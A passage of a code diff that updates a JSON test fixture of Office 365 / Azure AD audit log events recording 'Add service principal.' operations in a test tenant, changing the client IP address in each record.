+17430,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:31", "ExtendedProperties": [ { 
@@ -17672,7 +17672,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"M
ozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": 
\\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) 
Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n 
}\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -17702,9 +17702,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:31", "ExtendedProperties": [ { 
@@ -17944,7 +17944,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"M
ozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": 
\\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) 
Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n 
}\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -17974,9 +17974,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:31", "ExtendedProperties": [ { 
@@ -18216,7 +18216,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\"